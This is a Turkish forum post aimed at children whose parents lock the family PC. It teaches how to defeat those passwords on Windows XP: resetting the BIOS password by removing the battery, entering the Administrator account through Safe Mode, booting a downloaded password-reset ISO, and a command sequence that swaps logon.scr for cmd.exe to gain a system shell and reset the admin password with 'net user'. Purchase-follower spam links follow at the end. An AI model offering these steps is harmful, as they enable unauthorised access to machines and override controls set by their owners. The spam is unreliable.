Pc Başlarken Karşınıza Çıkan Pw’rı Kırma

TSunami_61

Kayıtlı Üye
Bazı Aileler Çocuğunun Bilgisayarın Başınadan Kaldırmak İçin PC’ye Şifre Koyar ve Çocuk Bilgisayarı Açamaz İşte Bu Noktada Bu Konu O Çocuklar İçin Genel Olarak Bilgisayar Başlarken Karşılaşabileceğiniz Şifreleri Kırmayı Öğretmen Amacıyla Açtım. Yazıyı Windows XP işletim sitemi için açtım.

Bilgisayar Başlarken Karşınıza Çıkan Şifreleri Kırmak

BIOS Şifresini Kırma

BIOS ekranındayken sizden şifre istiyorsa şifreyi de bilmiyorsanız ya da unuttuysanız yapmanız gerekenler şunlardır.

İlk önce kasayı açın.
Daha sonra BIOS pilini bulun. Bu pil normal saat pili gibidir hane şu ince geniş olanlardan. BIOS pilinin görevi sitemin şifrelerini ve tarihini hafızada tutmaktır yani pili çıkarınca bu ayarlar sıfırlanır. Pili çıkartın ve 5, 10 dakika bekleyin.
Pili geri takın ve kasayı kapatın. Bilgisayar açılırken artık o şifreyi sormayacaktır.

Not: Bazı anakartlarda BIOS pili anakarta entegre edilmiş bir şekildedir o yüzden onlarda bu yöntem işe yaramaz. Ama çoğu anakartlarda bu yöntem işe yarar.

Windows XP de Kullanıcı Hesabının Şifresini Kırmak

Windows XP kullanıcı hesabına babanız veya abiniz bilgisayarın başında fazla zaman geçirmemeniz için kullanıcı hesabına şifre koyduysa veya koyduğunuz şifreyi unuttuysanız format atmanıza gerek yok yapmanız gerekenler aşağıdaki adımları takip edin.

Bilgisayar açılırken F8 ze basın ve Güvenlik Modda açın.
Karşınıza kullanıcı hesapları çıkacak. Administrator hesabıyla açın.
Denetim Masasından Kullanıcı Hesaplarından artık hangi kullanıcının şifresini kırmak istiyorsanız onu seçin ve Parolayı Kaldır ı işaretleyin

Daha basit bir yöntemi ise kullanıcı hesabına şifre istediği yere gelince iki kere Ctral + Alt + Delete’ye basın ve kullanıcı hesabına Administrator yazın ve Enterlayın. Yöneticiye girdikten sonra gerisi aynı kullanıcı hesaplarından parolayı kaldırın veya deyiştirin.

Not:Eğer Administrator’ra şifre koymuşlarsa onun için CD gerekecek. Verdiğim programı iso dosyasıdır CD ye atın. Programsi kendi bootlu nero ile CD ye atabilirsiniz. Programın boyutu 4 mb felan.

CD yi takın takın ve Windows’u açın. Karşınıza Windows kurulum ekranı gelecektir.

İkinci adım ise windowsun yüklü olduğu sürücüyü seçmek gerekiyor.Windows C sürücüsünde yüklü ise 1’i seçin.

Üçüncü ve son adımda ise hangi kullanıcının şifresini değiştirmek istiyorsanız yanındaki numaraya göre seçiyorsunuz.

Ben Adminisrator kullanıcısının şifresini değiştirmek istiyorum onun için 1’e basıyorum ve bana şifrenin “12345” olsun mu? yoksa olmasın mı? diye soruyor.

"Set ’kullanıcı adı’ password to ’12345’ ? <Y/N>: Yani bu şekilde. “Y” harfine basıyoruz. Sonra şifre değişiyor 12345 oluyor. Bilgisayarı resetleyip cd’yi çıkardıktan sonra kullanıcı hesaba istediğimiz gibi girip çıkıyoruz.

Sınırlı Kullanıcı Hesaplarını Yöneticiye Çevirmek

Windows XP’de sınır kullanıcı hesabınızı Admin yapmak istiyorsanış aşağıdaki adımları teker teker yapmalısınız.

1) Sınırlı hesapla oturmu açın

2) Başlat****Çalıştıra gelip cmd yazın ve aşağıda ki komutları sarayla girin

cd\\
cd\\windows\\system32 (system32`nin icine girer)
mkdir temphack (temphack dosyasini yaratir)
copy logon.scr temphack\\logon.scr (logon.scr dosyasini temphack`in icine kopyalar)
copy cmd.exe temphack\\cmd.exe (cmd.exe dosyasini temphack`in icine kopyalar)
del logon.scr (orjinal logon.scr dosyasini siler)
rename cmd.exe logon.scr (cmd.exe dosyasini logon.scr olarak degistirir)
exit

3) Komuları girdikten sonra bilgisayarınızı yeniden başlatın. Bilgisayar başladığında karşınıza DOS ekranı çıkacaktır ve DOS ekranına şu komutları girini;

net user <admin hesabinin adi> istediginiz bir sifre
Örneğin Admin hesabının adı Ercab ve şifreyide 123456 yapmak istiyorsunuz
’net user Ercab 123456’ (Yazdığınızda Windows Açılıyor ve Şifrede 123456 oluyor)

Önemli Not: Zararları da olabilir ama yöntem bir bakıma işe yarıyor. Peki zararları ne olabilir.

1) del logon.scr (orjinal logon.scr dosyasini siler) XP üzerinde orijinal dosyalar silinmemelidir. Eğer silinirse XP’nin stabil çalışması bozulabilir.

2) 2- copy cmd.exe temphack\\cmd.exe (cmd.exe dosyasini temphack`in icine kopyalar) Bu Demek Oluyor ki. İstemediğiniz Takdirde. İstemediğiniz Yazılımlar Sizin Oturumunuzda CMD üzerinden Komut Çalıştırabilir. Ama kimse sizin böyle bir şey yapıp yapmadığınızı tahmin edemez.

Not:Sınırlı Kullanıcı Hesabında Alıntı Yaptım Fakat Biraz da Deyişikler Yaptım Onun Dışında Diğer Tüm Konuları Kendim Yazım.

http://rapidshare.com/files/76571651/wp_admin_pass.rar.html

bayigram takipçi satın al instagram beğeni satın al instagram takipçi satın al tiktok takipçi satın al Buy Followers bugün haber
vozol
Geri